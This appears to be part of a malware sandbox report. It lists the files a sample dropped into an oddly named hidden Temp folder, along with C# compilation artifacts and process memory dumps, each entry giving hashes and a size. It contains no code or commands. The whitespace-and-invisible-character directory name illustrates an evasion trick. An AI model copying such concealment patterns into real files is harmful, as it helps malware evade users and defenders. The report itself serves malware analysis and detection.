50f858caa7f4ac3a93cf141a5d15b4edeb447ee7

SHA256
57e3b0d22fa619da90237d8bcf8f922b142c9f6abf47efc5a1f5b208c4d3f023

SHA512
6b678f0dd0030806effe6825fd52a6a30b951e0c3dcf91dfd7a713d387aa8b39ec24368e9623c463360acba5e929e268f75ce996526c5d4485894b8ac6b2e0fa

Download Submit
C:\Users\Admin\AppData\Local\Temp\   ‌ \Common Files\Downloads\ExitStart.txt

Filesize
1.0MB

MD5
df1a337d6e5deb22895258617fde3610

SHA1
0437c1f9be5b7ee13902d2a30fe1ec6ba76af3d5

SHA256
6a03ed090cbd47a3cf71ce829d7122de3e953ba382b66eb4e56fd68eba233306

SHA512
ec2c533ef90b828421057616df284d3dbb7ef58d9559d6971b00249053b1a5007be353a320a8225cc6933cf392584ec312d59c5bf53b81ae1921406b77d48159

Download Submit
C:\Users\Admin\AppData\Local\Temp\   ‌ \Common Files\Downloads\PushRemove.xlsx

Filesize
384KB

MD5
285a9cd49d448a70ddfb0237c18cb441

SHA1
b8970088123f5f7b996832ee44d8809caf8a8b11

SHA256
4a6a8d2cdde4904e7a93ea2660bdde990c624e15a8edda021ac7e92c428c0c14

SHA512
b89c4136b5adeda4a75fcb7b09fa3e11e4965e77597c71863416ea2b9d781bcdfd3a837d447ec34745fd4b4de66ae9df21278309ce4be29538e29779184bc5d5

Download Submit
C:\Users\Admin\AppData\Local\Temp\   ‌ \Common Files\Downloads\RedoConvert.jpg

Filesize
672KB

MD5
dbcd77d658f83e0d79ef002d2a737f8c

SHA1
1b6572171900d8ed81e22f072f9aaf1938579a5e

SHA256
d35a335ab6611b9b278b1d71f7b04cb23b533faf087a4211589c88fe377de9a7

SHA512
8ebbef9573a6d6f9ecabe35ec4d9099de58049861fcc6896107d319a2af8356840749ea0a8342f0bebd65d02de9b4674b2499f4dc2008cff9164484ae2b7eb51

Download Submit
C:\Users\Admin\AppData\Local\Temp\   ‌ \Common Files\Downloads\RestartBackup.aif

Filesize
888KB

MD5
8bcbab0a796d10a6bd52ea32da944dcb

SHA1
2d4ab87e17a2cdcb93eaa9ff27fe3931035bc498

SHA256
806a7173e0ca047172fbbcad8d1cc5a459d2ec02f209ca10879b4ab0b741338b

SHA512
526293b3481f0abf628356c43c77bdc9d212161a054cfe88802454c16943336179fd30a0952950cd1b0f32e6485253cd2f5c400f6d4c49280a05520db6f8509b

Download Submit
C:\Users\Admin\AppData\Local\Temp\   ‌ \Common Files\Music\BlockGrant.csv

Filesize
284KB

MD5
b5bf9ad3811cb27f408edbf4e6386afe

SHA1
3844371c6c8e765daffe745b58c133afe22e7728

SHA256
3e770b25176bc7cfd8435b312c3fbeceb7b0cfb0e45ebd6966cd5acc1defb38f

SHA512
cd9daafdd05c493becf4e467725384b007f9462b3de8fc137981266971c374d15d1038f14b691ca3f37c82b7dc2f5d4175c5354e28bc0e71591cb8dbcdf3411c

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ujqynaz5\CSC179FE232A6064475B0FA57FAF04176D2.TMP

Filesize
652B

MD5
db9b1abcbce9815f04d9eab24ab55881

SHA1
bf4875a19757263a695b2490d526f27930df690c

SHA256
1c006c5177f7babe517c20313e09c56af83f3f488361400c1c75c2ffd296b889

SHA512
2838007136939d2496f2ec6bdcf1b42ae68aaf944a670871b78296731d9d76f75efd0faebcc24b572816f836d3bf3070111b7d8242ba030a385b2b3314ece7a3

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ujqynaz5\ujqynaz5.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ujqynaz5\ujqynaz5.cmdline

Filesize
607B

MD5
032a39d58e823f2dae2aa1f8eb6abd88

SHA1
52c2457aa9e272d1d25ca912bbdee9c5b7b39ce8

SHA256
1cb7de912010e87afe53796adb06d559dc4d0757674318981ca21d7b9e383cd9

SHA512
539d47a8104c49228154d816ea9784150fa5c92bb192b1c307586f2f3737ed51abf4f19b418aaffb16bef58219bd7bec01dcf234d517a6e4533bbf89c9225340

Download Submit
memory/2448-71-0x0000000074F90000-0x0000000075039000-memory.dmp

Filesize
676KB

Download
memory/2448-335-0x00000000750E0000-0x0000000075217000-memory.dmp

Filesize
1.2MB

Download
memory/2448-381-0x0000000075220000-0x000000007523B000-memory.dmp

Filesize
108KB

Download
memory/2448-383-0x0000000075290000-0x000000007529D000-memory.dmp

Filesize
52KB

Download
memory/2448-384-0x0000000075260000-0x0000000075287000-memory.dmp

Filesize
156KB

Download
memory/2448-385-0x0000000075240000-0x0000000075258000-memory.dmp

Filesize
96KB

Download
memory/2448-386-0x0000000075070000-0x000000007507C000-memory.dmp

Filesize
48KB

Download
memory/2448-387-0x00000000752F0000-0x0000000075800000-memory.dmp

Filesize
5.1MB

Download
memory/2448-389-0x00000000750E0000-0x0000000075217000-memory.dmp

Filesize
1.2MB

Download
memory/2448-390-0x0000000075040000-0x000000007506C000-memory.dmp

Filesize
176KB

Download
memory/2448-391-0x0000000074F90000-0x0000000075039000-memory.dmp

Filesize
676KB

Download
memory/2448-392-0x0000000074B80000-0x0000000074B8C000-memory.dmp

Filesize
48KB

Download
memory/2448-393-0x0000000074B90000-0x0000000074BA0000-memory.dmp

Filesize
64KB

Download
memory/2448-394-0x0000000074C00000-0x0000000074F8C000-memory.dmp

Filesize
3.5MB

Download
memory/2448-395-0x0000000074A60000-0x0000000074B78000-memory.dmp

Filesize
1.1MB

Download
memory/2448-388-0x00000000750C0000-0x00000000750D6000-memory.dmp

Filesize
88KB

Download
memory/2448-382-0x00000000752A0000-0x00000000752BE000-memory.dmp

Filesize
120KB

Download
memory/2448-330-0x00000000752A0000-0x00000000752BE000-memory.dmp

Filesize
120KB

Download
memory/2448-334-0x0000000075220000-0x000000007523B000-memory.dmp

Filesize
108KB

Download
memory/2448-336-0x00000000750C0000-0x00000000750D6000-memory.dmp

Filesize
88KB

Download
memory/2448-338-0x0000000075040000-0x000000007506C000-memory.dmp

Filesize
176KB

Download
memory/2448-340-0x0000000074C00000-0x0000000074F8C000-memory.dmp

Filesize
3.5MB

Download
memory/2448-339-0x0000000074F90000-0x0000000075039000-memory.dmp

Filesize
676KB

Download
memory/2448-329-0x00000000752F0000-0x0000000075800000-memory.dmp

Filesize
5.1MB

Download
memory/2448-74-0x0000000003400000-0x000000000378C000-memory.dmp

Filesize
3.5MB

Download
memory/2448-25-0x00000000752F0000-0x0000000075800000-memory.dmp

Filesize
5.1MB

Download
memory/2448-48-0x0000000075290000-0x000000007529D000-memory.dmp

Filesize
52KB

Download
memory/2448-47-0x00000000752A0000-0x00000000752BE000-memory.dmp

Filesize
120KB

Download
memory/2448-54-0x0000000075260000-0x0000000075287000-memory.dmp

Filesize
156KB

Download
memory/2448-76-0x0000000074B90000-0x0000000074BA0000-memory.dmp

Filesize
64KB

Download
memory/2448-82-0x0000000074A60000-0x0000000074B78000-memory.dmp

Filesize
1.1MB

Download
memory/2448-81-0x00000000752A0000-0x00000000752BE000-memory.dmp

Filesize
120KB

Download
memory/2448-58-0x0000000075220000-0x000000007523B000-memory.dmp

Filesize
108KB

Download
memory/2448-57-0x0000000075240000-0x0000000075258000-memory.dmp

Filesize
96KB

Download
memory/2448-77-0x0000000074B80000-0x0000000074B8C000-memory.dmp

Filesize
48KB

Download
memory/2448-63-0x00000000750C0000-0x00000000750D6000-memory.dmp

Filesize
88KB

Download
memory/2448-64-0x0000000075070000-0x000000007507C000-memory.dmp

Filesize
48KB

Download
memory/2448-69-0x00000000752F0000-0x0000000075800000-memory.dmp

Filesize
5.1MB

Download
memory/2448-70-0x0000000075040000-0x000000007506C000-memory.dmp

Filesize
176KB

Download
memory/2448-72-0x0000000074C00000-0x0000000074F8C000-memory.dmp

Filesize
3.5MB

Download
memory/2448-60-0x00000000750E0000-0x0000000075217000-memory.dmp

Filesize
1.2MB

Download
memory/2644-311-0x0000000006010000-0x000000000605C000-memory.dmp

Filesize
304KB

Download
memory/2644-305-0x0000000005970000-0x0000000005CC4000-memory.dmp

Filesize
3.3MB

Download
memory/3620-237-0x000000006E7B0000-0x000000006E7FC000-memory.dmp

Filesize
304KB

Download
memory/3620-353-0x0000000006750000-0x000000000679C000-memory.dmp

Filesize
304KB

Download
memory/4596-250-0x0000000006EC0000-0x0000000006F52000-memory.dmp

Filesize
584KB

Download
memory/4596-248-0x0000000006310000-0x0000000006332000-memory.dmp

Filesize
136KB

Download
memory/4596-249-0x00000000073D0000-0x0000000007974000-memory.dmp

Filesize
5.6MB

Download
memory/4828-276-0x0000000006A60000-0x0000000006A68000-memory.dmp

Filesize
32KB

Download
memory/4884-364-0x0000000005A30000-0x0000000005D84000-memory.dmp

Filesize
3.3MB

Download
memory/4932-284-0x0000000007A20000-0x0000000007A28000-memory.dmp

Filesize
32KB

Download
memory/4932-281-0x0000000007930000-0x000000000793E000-memory.dmp

Filesize
56KB

Download
memory/4932-226-0x000000006E7B0000-0x000000006E7FC000-memory.dmp

Filesize
304KB

Download
memory/4932-129-0x0000000005D50000-0x0000000005DB6000-memory.dmp

Filesize
408KB

Download
memory/4932-147-0x0000000005EC0000-0x0000000006214000-memory.dmp

Filesize
3.3MB

Download
memory/4932-282-0x0000000007940000-0x0000000007954000-memory.dmp

Filesize
80KB

Download
memory/4932-128-0x00000000056B0000-0x0000000005716000-memory.dmp

Filesize
408KB

Download
memory/5016-247-0x0000000007240000-0x00000000072D6000-memory.dmp

Filesize
600KB

Download
memory/5016-158-0x00000000058A0000-0x00000000058BE000-memory.dmp

Filesize
120KB

Download
memory/5016-251-0x00000000071C0000-0x00000000071D1000-memory.dmp

Filesize
68KB

Download
memory/5016-283-0x0000000007300000-0x000000000731A000-memory.dmp

Filesize
104KB

Download
memory/5016-118-0x0000000004E70000-0x0000000005498000-memory.dmp

Filesize
6.2MB

Download
memory/5016-127-0x0000000005510000-0x0000000005532000-memory.dmp

Filesize
136KB

Download
memory/5016-236-0x0000000007030000-0x000000000703A000-memory.dmp

Filesize
40KB

Download
memory/5016-83-0x0000000002380000-0x00000000023B6000-memory.dmp

Filesize
216KB

Download
memory/5016-225-0x0000000006FC0000-0x0000000006FDA000-memory.dmp

Filesize
104KB

Download
memory/5016-224-0x0000000007600000-0x0000000007C7A000-memory.dmp

Filesize
6.5MB

Download
memory/5016-223-0x0000000006C90000-0x0000000006D33000-memory.dmp

Filesize
652KB

Download
memory/5016-222-0x0000000006230000-0x000000000624E000-memory.dmp

Filesize
120KB

Download
memory/5016-211-0x0000000006C50000-0x0000000006C82000-memory.dmp

Filesize
200KB

Download
memory/5016-212-0x000000006E7B0000-0x000000006E7FC000-memory.dmp

Filesize
304KB

Download
memory/5016-164-0x00000000060F0000-0x000000000613C000-memory.dmp

Filesize
304KB

Download